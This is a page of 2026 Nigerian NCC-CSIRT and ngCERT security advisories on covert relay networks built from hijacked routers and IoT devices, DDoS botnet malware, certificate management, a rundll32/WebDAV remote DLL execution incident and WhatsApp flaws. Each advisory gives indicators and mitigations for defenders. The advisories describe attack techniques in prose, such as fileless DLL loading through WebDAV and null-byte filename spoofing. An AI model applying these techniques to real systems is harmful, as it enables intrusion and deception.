Thursday June 11, 2026

Advisory ID: NCC-CSIRT-2026-016

Summary: 

The United Kingdom’s National Cyber Security Centre (NCSC), in coordination with international cybersecurity and intelligence partners, has warned of ongoing malicious cyber activities conducted by Chinese-linked threat actors using covert networks of compromised internet-connected devices to conceal cyber operations.

The attackers reportedly exploit vulnerable routers, smart devices, and internet-facing infrastructure to create stealth relay networks capable of masking malicious traffic, conducting cyber espionage, and launching cyberattacks against government agencies, critical infrastructure, and private organizations.

The infrastructure allows attackers to hide their real origin, evade attribution, and maintain long-term operational access while blending malicious traffic into legitimate internet activity. The threat poses significant risks to telecommunications providers, Internet Service Providers (ISPs), government networks, and critical national infrastructure globally, including Nigeria and the wider West African region.

Damage: Critical

Probability: High

Product(s): 

  • Home and Enterprise Routers
  • Internet of Things (IoT) Devices
  • Smart Home Appliances
  • Network Edge Devices
  • VPN Gateways
  • Firewalls
  • Consumer Premises Equipment (CPE)
  • Internet-Connected Cameras and Smart Devices

Version(s): 

  • Devices running outdated or unsupported firmware
  • Devices using default or weak administrative credentials
  • Unpatched SOHO (Small Office/Home Office) routers and IoT systems
  • Unsupported legacy networking equipment

Platform(s): 

  • Broadband Internet Infrastructure
  • Residential Networks
  • Enterprise Networks
  • Cloud-Connected IoT Environments
  • Linux-Based Embedded Systems
  • Router Operating Systems
  • Smart Device Ecosystems

Description: 

According to international cybersecurity authorities, the threat actors are building covert operational networks by compromising internet-connected devices such as routers, smart appliances, and other edge networking systems.

The attackers exploit weak passwords, outdated firmware, exposed remote administration interfaces, and unpatched vulnerabilities to gain unauthorized access to these devices. Once compromised, the devices are incorporated into hidden proxy or relay infrastructures that route malicious traffic on behalf of the attackers.

This infrastructure enables attackers to disguise their real locations and conduct malicious activities while appearing to originate from legitimate residential or enterprise internet connections. Such techniques significantly complicate cyber attribution and detection efforts.

The compromised devices may be used to:

  • Relay malicious traffic
  • Conduct cyber espionage
  • Support command-and-control (C2) communications
  • Launch Distributed Denial-of-Service (DDoS) attacks
  • Facilitate credential theft and malware distribution

The advisory indicates that the threat actors specifically target poorly secured internet-facing infrastructure and leverage globally distributed networks of compromised devices to sustain persistent cyber operations.

The threat is particularly concerning because compromised devices may continue operating normally while secretly participating in malicious activities without the knowledge of device owners.

Description: 

Organizations should monitor the following indicators:

Network Indicators

  • Unusual outbound traffic from routers or IoT devices
  • Persistent encrypted outbound connections to unknown IP addresses
  • Abnormal DNS requests or DNS tunnelling activity
  • Unexpected proxy or relay traffic originating from internal networks
  • Large volumes of outbound traffic from consumer premises equipment (CPE

Device Indicators

  • Unauthorized configuration changes on routers or firewalls
  • Unknown administrator accounts
  • Unexpected device reboots or degraded performance
  • Unusual open ports or remote management services
  • Firmware modifications or unauthorized scheduled tasks

Operational Indicators

  • Unexpected communications with foreign IP addresses
  • Detection of botnet or proxy network signatures
  • Devices participating in DDoS traffic patterns

Consequences: 

Successful exploitation may result in:

  • Unauthorized use of compromised devices as relay infrastructure for cyberattacks
  • Concealment of malicious cyber operations behind legitimate residential or enterprise networks
  • Data theft and cyber espionage against government and critical infrastructure organizations
  • Distributed Denial-of-Service (DDoS) attacks using hijacked devices
  • Reputational and attribution risks for affected Internet Service Providers
  • Long-term covert access to vulnerable network environments
  • Increased exposure of telecommunications infrastructure to an advanced threat actor

Threat Types: 

  • Advanced Persistent Threat (APT) Activity
  • Cyber Espionage
  • Botnet Operations
  • Proxy / Relay Network Abuse
  • Infrastructure Hijacking
  • Covert Command-and-Control (C2) Operations
  • IoT Device Exploitation
  • Network Obfuscation and Evasion

Solutions/Mitigations:  

NCC-CSIRT recommends the following mitigation steps:

  • Monitor customer networks for unusual proxy or relay traffic patterns.
  • Identify and isolate compromised routers or IoT devices.
  • Enforce firmware updates and security hardening for managed devices.
  • Disable unnecessary remote management interfaces.
  • Deploy network anomaly detection systems to identify covert relay activity.
  • Conduct threat hunting activities for covert relay or proxy traffic within enterprise and telecom networks.
  • Review the security posture of all internet-facing infrastructure and edge devices.
  • Monitor for signs of unauthorized access to routers, VPN devices, and firewalls.
  • Collaborate with national cybersecurity authorities and ISPs to report suspicious infrastructure
  • Deploy endpoint and network monitoring solutions capable of detecting botnet or proxy activity.

References:

Advisory ID: NCC-CSIRT-2026-015

Summary: 

The NCC-CSIRT has observed the following cyber threats in the communications sector: increased activities involving malware strains such as Andromeda, BruteForceBot, Win.AsyncRAT, Gamut, and StealRat are being leveraged to orchestrate Distributed Denial-of-Service (DDoS) attacks. These malware families are used to compromise systems and form botnets capable of launching large-scale volumetric and application-layer attacks.

Damage: High

Probability: High

Product(s): 

  • Network Infrastructure
  • Endpoints
  • Servers
  • Customer Premises Equipment (CPE)

Version(s): 

All versions

Platform(s): 

  • Windows
  • Linux
  • Network Devices
  • IoT Devices

Description: 

Recent threat intelligence indicates the use of the following malware:

Andromeda: Modular botnet malware used for system compromise and DDoS operations.

BruteForceBot: Used for credential brute-force attacks and botnet recruitment.

Win.AsyncRAT: Remote access trojan enabling remote control and DDoS deployment.

Gamut: Known for spam and botnet activity, also leveraged for DDoS campaigns.

StealRat: Supports credential theft and remote control, aiding botnet expansion.

These malware strains enable attackers to build distributed botnets used to generate high volumes of malicious traffic, resulting in denial-of-service conditions.

Impacts: 

  • Service disruption and degradation of telecommunications services
  • Network congestion and bandwidth exhaustion
  • Loss of availability of critical systems and services
  • Compromise of infected systems leading to further propagation
  • Reputational damage and potential regulatory implications

Threat Types: 

  • Botnet Malware
  • DDoS (Volumetric and Application Layer)
  • Remote Access Trojan (RAT),
  • Credential Attacks

Solutions/Mitigations:  

NCC-CSIRT recommends the following mitigation steps:

  • Deploy DDoS mitigation solutions (traffic filtering, rate limiting).
  • Monitor network traffic for anomalies.
  • Patch and update systems regularly.
  • Implement endpoint protection (EDR/AV).
  • Enforce strong authentication (MFA, password policies).
  • Block command-and-control (C&C) communications.
  • Leverage threat intelligence and share IOCs.
  • Develop and test incident response plans.

References:

Advisory ID:   ngCERT-2026-060004

Damage:      Critical 

Probability:  High

Platform(s):  All Systems Using Digital Certificates (Websites, APIs, Servers, IoT)

SUMMARY

ngCERT warns organisations about the severe risks posed by expired or mismanaged digital certificates. Expired or poorly handled TLS/SSL certificates can trigger sudden widespread service outages, expose systems to security attacks, erode user trust and cause significant financial and reputational damage. With shorter certificate lifespans and the growing number of certificates in use, ineffective management has become a major threat to business continuity and cybersecurity. Organisations using digital certificates are strongly advised to implement robust certificate management practices immediately.

DESCRIPTION

Digital certificates serve as machine credentials for authentication, confidentiality, and integrity in encrypted communications. Expired certificates can shut down websites, APIs, and entire enterprise systems. Key challenges include manual tracking of large numbers of certificates, lack of visibility, and failure to monitor expirations. Proper management involves discovery, monitoring for policy compliance and usage, timely rotation before expiry, and revocation of compromised certificates. Automation and centralised visibility are strongly recommended to manage the increasing volume of certificates in modern environments.

CONSEQUENCES

Failure to manage digital certificates properly may lead to:

    1. Service outages and downtime.
    2. Browser security warnings that damage user trust and reputation.
    3. Increased vulnerability to man-in-the-middle attacks and data interception.
    4. Operational disruptions affecting websites, APIs, internal systems, and connected devices.
    5. Compliance violations and potential financial losses from unplanned interruptions. 

SOLUTION/MITIGATION

Organisations are strongly advised to apply these mitigations:

    1. Implement automated certificate discovery across all environments.
    2.  Establish centralised visibility and inventory of all certificates.
    3. Monitor expiration dates with proactive alerts (30–90 days in advance).
    4. Automate certificate renewal and rotation before expiry.
    5. Enforce short certificate lifespans and regular rotation policies.
    6.  Revoke compromised or misused certificates immediately.
    7. Adopt certificate management platforms to automate the lifecycle.
    8. Conduct regular audits and train teams on certificate best practices.    

HYPERLINK

Advisory ID: NCC-CSIRT-2026-024

Summary: 

A Remote Code Execution (RCE) incident involving the execution of malicious code on a Windows endpoint has been observed within the Communications Sector. The activity involved the abuse of legitimate Windows components to retrieve and execute a malicious payload from a remote server, allowing unauthorized code execution on the affected system.

This technique can enable threat actors to compromise endpoints, evade traditional security controls, and potentially establish further access within a network. Organizations are advised to review their security controls and implement the recommended mitigation measures to reduce the risk of similar attacks.

Damage: High

Probability: High

Product(s): 

Microsoft Windows Operating System

Version(s):

All versions supporting WebClient/WebDAV and rundll32 execution (various Windows builds).

Platform(s):

Windows endpoints in enterprise and communications infrastructure environments.

Description: 

A Remote Code Execution (RCE) incident was observed in which a threat actor leveraged Windows native functionality to remotely retrieve and execute a malicious DLL payload. The attack utilized a Living-off-the-Land (LotL) technique involving the execution of rundll32.exe through cmd.exe, combined with the abuse of the Windows WebClient service and WebDAV protocol.

The malicious payload was hosted on attacker-controlled infrastructure and delivered over HTTPS through a WebDAV-accessible UNC path. Upon execution, the Windows WebClient service translated the remote resource request into WebDAV traffic, enabling the payload to be dynamically loaded and executed without a traditional file download to disk.

Observed indicators included suspicious cmd.exe → rundll32.exe process chains, WebDAV-related HTTPS traffic, and use of the HTTP PROPFIND method, remote DLL execution, and communication with a newly registered domain used for payload delivery. This technique can significantly reduce forensic visibility and increase the likelihood of evading conventional file-based security controls.

If successful, the attack may result in unauthorized code execution, endpoint compromise, persistence, credential theft, lateral movement, and further malicious activity within the affected environment.

Impacts: 

Successful exploitation may result in:

  • Full remote execution of attacker-controlled code on endpoints
  • Execution of malicious DLL payloads without writing files to disk
  • Potential credential theft or system manipulation
  • Possible lateral movement across enterprise networks
  • Reduced detection due to legitimate Windows process abuse
  • Compromise of user endpoints in communications environments

Threat Types: 

  • Remote Code Execution (RCE)
  • Living-off-the-Land (LOLBIN) Abuse
  • WebDAV-based Payload Delivery
  • Command Execution via Native Windows Tools
  • Endpoint Evasion Techniques

Solutions/Mitigations:  

NCC-CSIRT recommends the following mitigation steps:

  • Disable unnecessary WebDAV services and functionality.
  • Monitor for suspicious cmd.exe and rundll32.exe execution.
  • Restrict outbound WebDAV and remote file-share access where possible.
  • Block known malicious domains and indicators of compromise.
  • Enable enhanced endpoint monitoring and command-line logging.
  • Conduct threat hunting for similar activity across the environment.
  • Review EDR rules to detect abuse of legitimate Windows utilities.
  • Investigate affected systems and remediate identified threats.

References:

Advisory ID:   ngCERT-2026-050005

SUMMARY

A vulnerability has been identified in WhatsApp on iOS, Android, and Windows involving the processing of rich media responses linked to Instagram Reels content and dubbed as CVE-2026-23866. The vulnerability may allow attackers to manipulate embedded metadata and trigger arbitrary or attacker-controlled URLs. This flaw can be exploited remotely through crafted messages, enabling phishing, malicious redirection, and potential cross-application invocation via unsafe URL handling. The issue increases exposure to social engineering-driven attacks within trusted messaging environments.

DESCRIPTION

The vulnerability CVE-2026-23866 is caused by inadequate validation of AI-generated rich response messages linked to Instagram Reels within WhatsApp. When users receive or interact with such messages, the application fails to properly validate embedded media URLs. This enables attackers to craft malicious content forcing victims’ devices to retrieve and process data from attacker-controlled sources, potentially triggering operating system-level URL scheme handlers without user consent. This vulnerability affects WhatsApp for iOS (v2.25.8.0 – v2.26.15.72) and WhatsApp for Android (v2.25.8.0 – v2.26.7.10). In addition, CVE-2026-23863 affects WhatsApp for Windows (versions prior to v2.3000.1032164386.258709). This is classified as an attachment spoofing vulnerability arising from improper handling of filenames containing embedded null bytes (\x00). This flaw allows attackers to disguise malicious files as legitimate attachments by exploiting differences between application-level and system-level filename interpretation, requiring only minimal user interaction (a single click) and no special privileges to exploit.

Damage:      Critical 

Probability:  Medium

Platform(s):  iOS, Android, Windows

CONSEQUENCES

Successful exploitation of the vulnerability could lead to:

    1. Execution of malicious or unintended URL schemes.
    2.  Unauthorised invocation of system-level applications or services.
    3.  Delivery of phishing content or malware.
    4.  Attachment spoofing, resulting in user deception.
    5.  Potential compromise of sensitive information and device security 

SOLUTION/MITIGATION

ngCERT advises the following measures:

    1. Update WhatsApp for iOS, Androidand Windows to versions later than v2.26.15.72v2.26.7.10 and 2.3000.1038897100.261501, respectively.
    2. Apply mobile device management (MDM) policies enforcing mandatory app updates across enterprise environments.
    3. Monitor network traffic for anomalous URL scheme invocations originating from messaging applications.
    4. Educate users about risks associated with AI-generated rich media content in messaging platforms.    

HYPERLINK

  1. DEEPLOAD MALWARE TARGETING WADVISORY ON DEEPLOAD MALWARE TARGETING WINDOWS SYSTEMS THROUGH CLICKFIX SOCIAL ENGINEERINGINDOWS SYSTEMS THROUGH CLICKFIX SOCIAL ENGINEERING
  2. ngCERT SECURITY ADVISORY ON MICROSOFT DEFENDER ZERO-DAY (CVE-2026-33825) ENABLES SYSTEM-LEVEL PRIVILEGE ESCALATION
  3. ngCERT SECURITY ADVISORY ON ESCALATING CYBERSECURITY THREATS AND ONGOING ATTACKS TARGETING ORGANISATIONS IN NIGERIA
  4. ngCERT SECURITY ADVISORY ON ESCALATIING DISTRIBUTED DENIAL-OF-SERVICE (DDOS) THREATS WITHIN CRITICAL INFORMATION INFRASTRUCTURE

Page 1 of 40